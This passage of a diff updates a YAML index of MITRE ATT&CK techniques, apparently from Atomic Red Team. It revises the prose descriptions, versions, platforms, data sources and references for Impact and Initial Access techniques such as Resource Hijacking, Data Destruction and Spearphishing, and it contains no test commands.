-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58222,7 +59183,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -58239,8 +59200,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -58259,99 +59223,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -58360,7 +59298,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58386,9 +59324,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -58444,55 +59383,11 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests: []
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58507,6 +59402,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -58519,16 +59418,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -58596,11 +59531,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58618,7 +59552,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58645,7 +59579,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -58695,13 +59629,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -58769,11 +59702,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -58838,13 +59770,12 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests: []
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -58922,7 +59853,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -58972,11 +59902,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59015,10 +59944,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -59035,7 +59964,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -59074,12 +60003,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59141,7 +60069,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -59158,7 +60086,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -59188,7 +60115,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59202,7 +60129,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -59265,12 +60191,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59345,7 +60270,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59359,19 +60284,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -59397,7 +60321,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -59452,7 +60376,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -59515,11 +60438,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
